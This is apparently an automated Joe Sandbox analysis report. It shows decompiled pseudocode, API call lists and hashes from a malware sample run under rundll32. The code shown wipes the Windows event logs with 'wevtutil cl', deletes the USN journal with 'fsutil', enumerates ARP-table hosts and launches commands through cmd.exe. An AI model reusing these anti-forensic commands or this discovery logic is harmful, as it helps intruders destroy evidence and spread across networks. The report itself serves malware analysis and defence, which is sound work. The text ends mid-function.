                                                                                                          				 *((intOrPtr*)(_t59 + 0x50)) = 2;
                                                                                                          				 *((char*)(_t59 + 0x54)) = 3;
                                                                                                          				_t54 = _t18 - _t77;
                                                                                                          				do {
                                                                                                          					_t66 =  *_t77;
                                                                                                          					 *((char*)(_t54 + _t77)) = _t66;
                                                                                                          					_t77 = _t77 + 1;
                                                                                                          				} while (_t66 != 0);
                                                                                                          				__imp__#19(_a4, _t59, _v12, 0); // executed
                                                                                                          				if(_t54 > 0) {
                                                                                                          					_t78 = _v16;
                                                                                                          					__imp__#16(_a4, _t78, 0xffff, 0); // executed
                                                                                                          					if(_t54 > 0 &&  *((intOrPtr*)(_t78 + 9)) == 0) {
                                                                                                          						 *_a12 =  *((intOrPtr*)(_t78 + 0x2a));
                                                                                                          						_v5 = 1;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				HeapFree(GetProcessHeap(), 8, _t59);
                                                                                                          				goto L13;
                                                                                                          			}






















                                                                                                          0x04a42069
                                                                                                          0x04a42076
                                                                                                          0x04a42078
                                                                                                          0x04a4207d
                                                                                                          0x04a42188
                                                                                                          0x04a4218e
                                                                                                          0x04a4218e
                                                                                                          0x04a42083
                                                                                                          0x04a42086
                                                                                                          0x04a42089
                                                                                                          0x04a42089
                                                                                                          0x04a4208b
                                                                                                          0x04a4208c
                                                                                                          0x04a42093
                                                                                                          0x04a42099
                                                                                                          0x04a420a1
                                                                                                          0x04a420a5
                                                                                                          0x04a42175
                                                                                                          0x04a42181
                                                                                                          0x00000000
                                                                                                          0x04a42187
                                                                                                          0x04a420b3
                                                                                                          0x04a420ba
                                                                                                          0x04a420bc
                                                                                                          0x04a420c2
                                                                                                          0x04a420c6
                                                                                                          0x04a420c9
                                                                                                          0x04a420cd
                                                                                                          0x04a420d3
                                                                                                          0x04a420d6
                                                                                                          0x04a420d6
                                                                                                          0x04a420d8
                                                                                                          0x04a420d9
                                                                                                          0x04a420e0
                                                                                                          0x04a420e2
                                                                                                          0x04a420e5
                                                                                                          0x04a420ea
                                                                                                          0x04a420ee
                                                                                                          0x04a420f1
                                                                                                          0x04a420f8
                                                                                                          0x04a420ff
                                                                                                          0x04a42106
                                                                                                          0x04a42109
                                                                                                          0x04a42110
                                                                                                          0x04a42117
                                                                                                          0x04a4211b
                                                                                                          0x04a4211d
                                                                                                          0x04a4211d
                                                                                                          0x04a4211f
                                                                                                          0x04a42122
                                                                                                          0x04a42123
                                                                                                          0x04a42131
                                                                                                          0x04a42139
                                                                                                          0x04a4213b
                                                                                                          0x04a42148
                                                                                                          0x04a42150
                                                                                                          0x04a4215e
                                                                                                          0x04a42161
                                                                                                          0x04a42161
                                                                                                          0x04a42150
                                                                                                          0x04a4216f
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,04A4943A), ref: 04A4206D
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A42076
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,04A4943A), ref: 04A4209C
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A4209F
                                                                                                          • htons.WS2_32(?), ref: 04A420BC
                                                                                                          • send.WS2_32(?,00000000,?,00000000), ref: 04A42131
                                                                                                          • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04A42148
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04A4943A), ref: 04A42168
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A4216F
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04A4943A), ref: 04A4217A
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A42181
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 1780562090-636472023
                                                                                                          • Opcode ID: f108b6049c63c6d0f0f961c7c37f686e19f08e176d75df6b349439469894c8a5
                                                                                                          • Instruction ID: 83febe08fdf83114a3bdfecc5010145d0458a3daf96723f893383824e9e36e04
                                                                                                          • Opcode Fuzzy Hash: f108b6049c63c6d0f0f961c7c37f686e19f08e176d75df6b349439469894c8a5
                                                                                                          • Instruction Fuzzy Hash: CD41A275500246ABEF118FA8D898B9E7FB8EFD9340F044098F9449B291DB7AD809CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 54%
                                                                                                          			E04A48A6F(void* __ecx, void* _a4) {
                                                                                                          				void* _v0;
                                                                                                          				void* _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				void _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				void* __esi;
                                                                                                          				int _t11;
                                                                                                          				intOrPtr _t13;
                                                                                                          				void* _t17;
                                                                                                          				void* _t23;
                                                                                                          				void _t24;
                                                                                                          				void* _t26;
                                                                                                          				void* _t27;
                                                                                                          				intOrPtr* _t29;
                                                                                                          				void* _t30;
                                                                                                          				void* _t31;
                                                                                                          
                                                                                                          				_t27 = __ecx;
                                                                                                          				_t30 = GetSystemMetrics;
                                                                                                          				_t11 = GetSystemMetrics(0x2000); // executed
                                                                                                          				_t23 = Sleep;
                                                                                                          				while(_t11 == 0) {
                                                                                                          					Sleep(0x1f4); // executed
                                                                                                          					_t11 = GetSystemMetrics(0x2000);
                                                                                                          				}
                                                                                                          				if(SetEvent(_a4) != 0) {
                                                                                                          					Sleep(0x3e8);
                                                                                                          				}
                                                                                                          				E04A48A23();
                                                                                                          				asm("int3");
                                                                                                          				_push(_t27);
                                                                                                          				_push(_t27);
                                                                                                          				_push(_t23);
                                                                                                          				_push(_t30);
                                                                                                          				_t31 = _v12;
                                                                                                          				_t24 =  *_t31;
                                                                                                          				_t13 =  *((intOrPtr*)(_t31 + 4));
                                                                                                          				_push(0x2000);
                                                                                                          				_v24 = _t24;
                                                                                                          				_v28 = _t13;
                                                                                                          				if(_t24 < _t13) {
                                                                                                          					_t29 = __imp__#14;
                                                                                                          					do {
                                                                                                          						_t17 = E04A4A567( *_t29(_t24)); // executed
                                                                                                          						if(_t17 != 0) {
                                                                                                          							__imp__#12( *_t29(_t24));
                                                                                                          							_t26 = E04A4641A(_t18);
                                                                                                          							if(_t26 != 0) {
                                                                                                          								E04A46B95(_t19, 0,  *((intOrPtr*)(_t31 + 8)));
                                                                                                          								HeapFree(GetProcessHeap(), 0, _t26);
                                                                                                          								_t31 = _v0;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						_t24 = _v12 + 1;
                                                                                                          						_v12 = _t24;
                                                                                                          					} while (_t24 < _v16);
                                                                                                          				}
                                                                                                          				LocalFree(_t31);
                                                                                                          				return 0;
                                                                                                          			}



















                                                                                                          0x04a48a6f
                                                                                                          0x04a48a74
                                                                                                          0x04a48a81
                                                                                                          0x04a48a83
                                                                                                          0x04a48a95
                                                                                                          0x04a48a90
                                                                                                          0x04a48a93
                                                                                                          0x04a48a93
                                                                                                          0x04a48aa4
                                                                                                          0x04a48aab
                                                                                                          0x04a48aab
                                                                                                          0x04a48aad
                                                                                                          0x04a48ab2
                                                                                                          0x04a48ab6
                                                                                                          0x04a48ab7
                                                                                                          0x04a48ab8
                                                                                                          0x04a48ab9
                                                                                                          0x04a48aba
                                                                                                          0x04a48abd
                                                                                                          0x04a48abf
                                                                                                          0x04a48ac2
                                                                                                          0x04a48ac3
                                                                                                          0x04a48ac6
                                                                                                          0x04a48acb
                                                                                                          0x04a48acd
                                                                                                          0x04a48ad3
                                                                                                          0x04a48ad7
                                                                                                          0x04a48ade
                                                                                                          0x04a48ae4
                                                                                                          0x04a48af0
                                                                                                          0x04a48af4
                                                                                                          0x04a48afb
                                                                                                          0x04a48b09
                                                                                                          0x04a48b0f
                                                                                                          0x04a48b0f
                                                                                                          0x04a48af4
                                                                                                          0x04a48b15
                                                                                                          0x04a48b16
                                                                                                          0x04a48b19
                                                                                                          0x04a48ad3
                                                                                                          0x04a48b1f
                                                                                                          0x04a48b2b

                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32 ref: 04A48A81
                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 04A48A90
                                                                                                          • GetSystemMetrics.USER32 ref: 04A48A93
                                                                                                          • SetEvent.KERNEL32(?), ref: 04A48A9C
                                                                                                          • Sleep.KERNEL32(000003E8), ref: 04A48AAB
                                                                                                          • htonl.WS2_32(74716490), ref: 04A48AD4
                                                                                                          • htonl.WS2_32(74716490), ref: 04A48AE1
                                                                                                          • inet_ntoa.WS2_32(00000000), ref: 04A48AE4
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04A48B02
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A48B09
                                                                                                          • LocalFree.KERNEL32(?,00002000,775F2D10,74716490), ref: 04A48B1F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeapMetricsSleepSystemhtonl$EventLocalProcessinet_ntoa
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 4223591894-636472023
                                                                                                          • Opcode ID: acdaec8a7fec15fa62cfc939f5094ca057c586fdaae5d8a328268188bb41cf5c
                                                                                                          • Instruction ID: f6138c4febaf08233b4ef1abccfbb35128083e3c64431a5d063020bb389a92e7
                                                                                                          • Opcode Fuzzy Hash: acdaec8a7fec15fa62cfc939f5094ca057c586fdaae5d8a328268188bb41cf5c
                                                                                                          • Instruction Fuzzy Hash: 1E118E79600315ABEB00AFA5DD88D5F7AACEFD93407044828E501A7140DA79ED028A60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 92%
                                                                                                          			E04A4808E() {
                                                                                                          				short _v524;
                                                                                                          				short _v526;
                                                                                                          				short _v2572;
                                                                                                          				void _t22;
                                                                                                          				void* _t30;
                                                                                                          				signed int _t32;
                                                                                                          				void* _t35;
                                                                                                          				WCHAR* _t38;
                                                                                                          
                                                                                                          				_v524 = 0;
                                                                                                          				_t38 = L"%wswevtutil cl %ws & ";
                                                                                                          				wsprintfW( &_v524, _t38,  &_v524, L"Setup");
                                                                                                          				wsprintfW( &_v524, _t38,  &_v524, L"System");
                                                                                                          				wsprintfW( &_v524, _t38,  &_v524, L"Security");
                                                                                                          				wsprintfW( &_v524, _t38,  &_v524, L"Application");
                                                                                                          				_t35 =  &_v524 - 2;
                                                                                                          				do {
                                                                                                          					_t22 =  *(_t35 + 2);
                                                                                                          					_t35 = _t35 + 2;
                                                                                                          				} while (_t22 != 0);
                                                                                                          				_t32 = 0x10;
                                                                                                          				_push( *0x4a57bc8 & 0x0000ffff);
                                                                                                          				memcpy(_t35, L"fsutil usn deletejournal /D %c:", _t32 << 2);
                                                                                                          				wsprintfW( &_v2572,  &_v524);
                                                                                                          				_v526 = 0;
                                                                                                          				_t30 = E04A47FB7( &_v2572, 3); // executed
                                                                                                          				return _t30;
                                                                                                          			}











                                                                                                          0x04a480a2
                                                                                                          0x04a480b5
                                                                                                          0x04a480bc
                                                                                                          0x04a480cc
                                                                                                          0x04a480dc
                                                                                                          0x04a480ec
                                                                                                          0x04a480f7
                                                                                                          0x04a480fa
                                                                                                          0x04a480fa
                                                                                                          0x04a480fe
                                                                                                          0x04a48101
                                                                                                          0x04a4810f
                                                                                                          0x04a48110
                                                                                                          0x04a48124
                                                                                                          0x04a48126
                                                                                                          0x04a4812d
                                                                                                          0x04a4813d
                                                                                                          0x04a48146

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wsprintf
                                                                                                          • String ID: %wswevtutil cl %ws & $Application$Security$Setup$System$fsutil usn deletejournal /D %c:
                                                                                                          • API String ID: 2111968516-1905612841
                                                                                                          • Opcode ID: b433344e669bf5c3e82e90dfef26754b9beab276e60655466fef32d79cfacbdf
                                                                                                          • Instruction ID: c2546fe148fefbfaa9fb4e7c08b8a138f349114a078486531182d5165dd72a99
                                                                                                          • Opcode Fuzzy Hash: b433344e669bf5c3e82e90dfef26754b9beab276e60655466fef32d79cfacbdf
                                                                                                          • Instruction Fuzzy Hash: 4011C6BAE003287ADB20D6A48D89FFB77ACEF44654F000591F958E3111EA74EE848F74
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 96%
                                                                                                          			E04A46E66(void* __ecx, struct _CRITICAL_SECTION* _a4, void* _a8, intOrPtr _a12) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				void* __esi;
                                                                                                          				void* _t46;
                                                                                                          				void* _t51;
                                                                                                          				void* _t54;
                                                                                                          				void* _t56;
                                                                                                          				signed int _t57;
                                                                                                          				void* _t72;
                                                                                                          				struct _CRITICAL_SECTION* _t82;
                                                                                                          
                                                                                                          				_t67 = __ecx;
                                                                                                          				_push(__ecx);
                                                                                                          				_t82 = _a4;
                                                                                                          				_v8 = 0;
                                                                                                          				if(_t82 == 0 || _a8 == 0) {
                                                                                                          					L11:
                                                                                                          					return _v8;
                                                                                                          				} else {
                                                                                                          					EnterCriticalSection(_t82);
                                                                                                          					_t46 = E04A46DA4(0, _t67, _t82, _a8, 0); // executed
                                                                                                          					if(_t46 == 0) {
                                                                                                          						_t68 =  *(_t82 + 0x20);
                                                                                                          						if( *(_t82 + 0x24) >=  *(_t82 + 0x20)) {
                                                                                                          							_t51 = HeapReAlloc(GetProcessHeap(), 8,  *(_t82 + 0x18), 0x3fc +  *(_t82 + 0x20) * 4);
                                                                                                          							if(_t51 != 0) {
                                                                                                          								 *(_t82 + 0x18) = _t51;
                                                                                                          								 *(_t82 + 0x20) =  *(_t82 + 0x20) + 0xff;
                                                                                                          								_v8 = E04A46E66(_t68, _t82, _a8, _a12);
                                                                                                          							}
                                                                                                          						} else {
                                                                                                          							_t54 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                          							 *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4) = _t54;
                                                                                                          							if(_t54 != 0) {
                                                                                                          								_t56 = HeapAlloc(GetProcessHeap(), 8,  *(_t82 + 0x1c));
                                                                                                          								 *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)) = _t56;
                                                                                                          								_t57 =  *(_t82 + 0x24);
                                                                                                          								_t72 =  *(_t82 + 0x18);
                                                                                                          								if(_t56 == 0) {
                                                                                                          									HeapFree(GetProcessHeap(), 0,  *(_t72 + _t57 * 4));
                                                                                                          								} else {
                                                                                                          									 *((intOrPtr*)( *(_t72 + _t57 * 4) + 4)) = _a12;
                                                                                                          									memcpy( *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)), _a8,  *(_t82 + 0x1c));
                                                                                                          									 *(_t82 + 0x24) =  *(_t82 + 0x24) + 1;
                                                                                                          									_v8 = 1;
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          					LeaveCriticalSection(_t82);
                                                                                                          					goto L11;
                                                                                                          				}
                                                                                                          			}












                                                                                                          0x04a46e66
                                                                                                          0x04a46e69
                                                                                                          0x04a46e6b
                                                                                                          0x04a46e71
                                                                                                          0x04a46e76
                                                                                                          0x04a46f73
                                                                                                          0x04a46f79
                                                                                                          0x04a46e85
                                                                                                          0x04a46e87
                                                                                                          0x04a46e93
                                                                                                          0x04a46e9a
                                                                                                          0x04a46ea3
                                                                                                          0x04a46ea8
                                                                                                          0x04a46f48
                                                                                                          0x04a46f50
                                                                                                          0x04a46f55
                                                                                                          0x04a46f5b
                                                                                                          0x04a46f68
                                                                                                          0x04a46f68
                                                                                                          0x04a46eae
                                                                                                          0x04a46ec1
                                                                                                          0x04a46ec9
                                                                                                          0x04a46ece
                                                                                                          0x04a46edc
                                                                                                          0x04a46ee7
                                                                                                          0x04a46eeb
                                                                                                          0x04a46eee
                                                                                                          0x04a46ef1
                                                                                                          0x04a46f29
                                                                                                          0x04a46ef3
                                                                                                          0x04a46ef9
                                                                                                          0x04a46f0d
                                                                                                          0x04a46f15
                                                                                                          0x04a46f18
                                                                                                          0x04a46f18
                                                                                                          0x04a46ef1
                                                                                                          0x04a46ece
                                                                                                          0x04a46ea8
                                                                                                          0x04a46f6c
                                                                                                          0x00000000
                                                                                                          0x04a46f72

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,74715520,74714F20,?,?,04A46A84,?,?,?), ref: 04A46E87
                                                                                                            • Part of subcall function 04A46DA4: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04A46E98,?,00000000,?,?,04A46A84,?,?), ref: 04A46DB5
                                                                                                            • Part of subcall function 04A46DA4: LeaveCriticalSection.KERNEL32(?,?,?,04A46E98,?,00000000,?,?,04A46A84,?,?), ref: 04A46E0C
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008,?,00000000,?,?,04A46A84,?,?,?), ref: 04A46EB8
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,04A46A84,?,?,?), ref: 04A46EC1
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,04A46A84,?,?,?), ref: 04A46ED9
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,04A46A84,?,?,?), ref: 04A46EDC
                                                                                                          • memcpy.MSVCRT ref: 04A46F0D
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,04A46A84,?,?,?), ref: 04A46F26
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04A46A84,?,?,?), ref: 04A46F29
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,?,04A46A84,?,?,?), ref: 04A46F41
                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,?,04A46A84,?,?,?), ref: 04A46F48
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,04A46A84,?,?,?), ref: 04A46F6C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 1369668251-636472023
                                                                                                          • Opcode ID: 6df9d9883b0e42a260c589040ed69af9da25a25c3f97cdc85e6084e6c35805f4
                                                                                                          • Instruction ID: 8d99bed4bcec109f8b2137db66ae3ab893c261d896280496b6a5291e1206ce6c
                                                                                                          • Opcode Fuzzy Hash: 6df9d9883b0e42a260c589040ed69af9da25a25c3f97cdc85e6084e6c35805f4
                                                                                                          • Instruction Fuzzy Hash: CC314675600A04EBDB219FA9C944D6EB7F9FFC9304F004918E98687691DB3AF912CF60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 25%
                                                                                                          			E04A4742C(intOrPtr _a4) {
                                                                                                          				long _v8;
                                                                                                          				long _v12;
                                                                                                          				void* _v16;
                                                                                                          				long _v20;
                                                                                                          				intOrPtr _v24;
                                                                                                          				short _v88;
                                                                                                          				void* __esi;
                                                                                                          				void* _t24;
                                                                                                          				void* _t29;
                                                                                                          				void* _t33;
                                                                                                          				void* _t44;
                                                                                                          				signed char* _t46;
                                                                                                          				long _t49;
                                                                                                          				intOrPtr* _t51;
                                                                                                          				void* _t54;
                                                                                                          
                                                                                                          				_t51 = __imp__GetIpNetTable;
                                                                                                          				_t49 = 0;
                                                                                                          				_v20 = 0;
                                                                                                          				_v8 = 0;
                                                                                                          				_t24 =  *_t51(0,  &_v8, 0); // executed
                                                                                                          				if(_t24 != 0xe8) {
                                                                                                          					if(_t24 != 0x7a) {
                                                                                                          						L15:
                                                                                                          						return _v20;
                                                                                                          					}
                                                                                                          					_t44 = HeapAlloc(GetProcessHeap(), 0, _v8);
                                                                                                          					_v16 = _t44;
                                                                                                          					if(_t44 == 0) {
                                                                                                          						L14:
                                                                                                          						goto L15;
                                                                                                          					}
                                                                                                          					_t29 =  *_t51(_t44,  &_v8, 0); // executed
                                                                                                          					if(_t29 != 0) {
                                                                                                          						L13:
                                                                                                          						HeapFree(GetProcessHeap(), _t49, _t44);
                                                                                                          						goto L14;
                                                                                                          					}
                                                                                                          					_v20 = 1;
                                                                                                          					_v12 = 0;
                                                                                                          					if( *_t44 <= 0) {
                                                                                                          						goto L13;
                                                                                                          					}
                                                                                                          					_v24 = 3;
                                                                                                          					_t46 = _t44 + 0x16;
                                                                                                          					do {
                                                                                                          						_push(4);
                                                                                                          						asm("repe cmpsb");
                                                                                                          						if(0 != 0) {
                                                                                                          							asm("sbb eax, eax");
                                                                                                          							asm("sbb eax, 0xffffffff");
                                                                                                          						}
                                                                                                          						if(0 == 0) {
                                                                                                          							wsprintfW( &_v88, L"%u.%u.%u.%u",  *(_t46 - 2) & 0x000000ff,  *(_t46 - 1) & 0x000000ff,  *_t46 & 0x000000ff, _t46[1] & 0x000000ff);
                                                                                                          							_t54 = _t54 + 0x18;
                                                                                                          							E04A46B95( &_v88, 0, _a4);
                                                                                                          						}
                                                                                                          						_v12 = _v12 + 1;
                                                                                                          						_t33 = _v16;
                                                                                                          						_t46 =  &(_t46[0x18]);
                                                                                                          					} while (_v12 <  *_t33);
                                                                                                          					_t44 = _t33;
                                                                                                          					_t49 = 0;
                                                                                                          					goto L13;
                                                                                                          				}
                                                                                                          				return 0;
                                                                                                          			}


















                                                                                                          0x04a47433
                                                                                                          0x04a4743a
                                                                                                          0x04a47442
                                                                                                          0x04a47445
                                                                                                          0x04a47448
                                                                                                          0x04a4744f
                                                                                                          0x04a4745b
                                                                                                          0x04a47512
                                                                                                          0x00000000
                                                                                                          0x04a47512
                                                                                                          0x04a47473
                                                                                                          0x04a47475
                                                                                                          0x04a4747a
                                                                                                          0x04a47511
                                                                                                          0x00000000
                                                                                                          0x04a47511
                                                                                                          0x04a47486
                                                                                                          0x04a4748a
                                                                                                          0x04a47502
                                                                                                          0x04a4750b
                                                                                                          0x00000000
                                                                                                          0x04a4750b
                                                                                                          0x04a4748c
                                                                                                          0x04a47493
                                                                                                          0x04a47498
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4749a
                                                                                                          0x04a474a1
                                                                                                          0x04a474a4
                                                                                                          0x04a474a4
                                                                                                          0x04a474af
                                                                                                          0x04a474b1
                                                                                                          0x04a474b3
                                                                                                          0x04a474b5
                                                                                                          0x04a474b5
                                                                                                          0x04a474ba
                                                                                                          0x04a474d8
                                                                                                          0x04a474de
                                                                                                          0x04a474e9
                                                                                                          0x04a474e9
                                                                                                          0x04a474ee
                                                                                                          0x04a474f1
                                                                                                          0x04a474f7
                                                                                                          0x04a474fa
                                                                                                          0x04a474fe
                                                                                                          0x04a47500
                                                                                                          0x00000000
                                                                                                          0x04a47500
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04A47448
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 04A47466
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A4746D
                                                                                                          • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04A47486
                                                                                                          • wsprintfW.USER32 ref: 04A474D8
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04A47504
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A4750B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$ProcessTable$AllocFreewsprintf
                                                                                                          • String ID: Oqt Uqt0Xqt$%u.%u.%u.%u
                                                                                                          • API String ID: 2259129056-892867211
                                                                                                          • Opcode ID: c265ac3730e700b81fd5eb5855350e008f8de330f07588f1a86f01f8c6ba8b56
                                                                                                          • Instruction ID: d3dd5a521c6596a9d2572d63e9a1f4288a80f8c6cf73e8733f8bf2e7b09fcd87
                                                                                                          • Opcode Fuzzy Hash: c265ac3730e700b81fd5eb5855350e008f8de330f07588f1a86f01f8c6ba8b56
                                                                                                          • Instruction Fuzzy Hash: B831D5B6D00159ABDB11CFA8DD849BEBBBCEFC9301F140456E901EA101D338AA05CB70
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A47FB7(intOrPtr _a4, signed int _a8) {
                                                                                                          				struct _PROCESS_INFORMATION _v20;
                                                                                                          				struct _STARTUPINFOW _v88;
                                                                                                          				short _v1648;
                                                                                                          				short _v1650;
                                                                                                          				short _v3696;
                                                                                                          				char* _t20;
                                                                                                          				char* _t21;
                                                                                                          				int _t26;
                                                                                                          				void* _t35;
                                                                                                          				long _t36;
                                                                                                          				long _t37;
                                                                                                          				int _t38;
                                                                                                          
                                                                                                          				_t38 = 0;
                                                                                                          				wsprintfW( &_v3696, L"/c %ws", _a4);
                                                                                                          				_v1650 = 0;
                                                                                                          				if(GetEnvironmentVariableW(L"ComSpec",  &_v1648, 0x30c) != 0 || GetSystemDirectoryW( &_v1648, 0x30c) != 0 && lstrcatW( &_v1648, L"\\cmd.exe") != 0) {
                                                                                                          					_t35 = 0x10;
                                                                                                          					_t20 =  &_v20;
                                                                                                          					do {
                                                                                                          						 *_t20 = 0;
                                                                                                          						_t20 = _t20 + 1;
                                                                                                          						_t35 = _t35 - 1;
                                                                                                          					} while (_t35 != 0);
                                                                                                          					_t36 = 0x44;
                                                                                                          					_t37 = _t36;
                                                                                                          					_t21 =  &_v88;
                                                                                                          					do {
                                                                                                          						 *_t21 = 0;
                                                                                                          						_t21 = _t21 + 1;
                                                                                                          						_t37 = _t37 - 1;
                                                                                                          					} while (_t37 != 0);
                                                                                                          					_v88.cb = _t36;
                                                                                                          					_t26 = CreateProcessW( &_v1648,  &_v3696, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
                                                                                                          					_t38 = _t26;
                                                                                                          					if(_t38 != 0) {
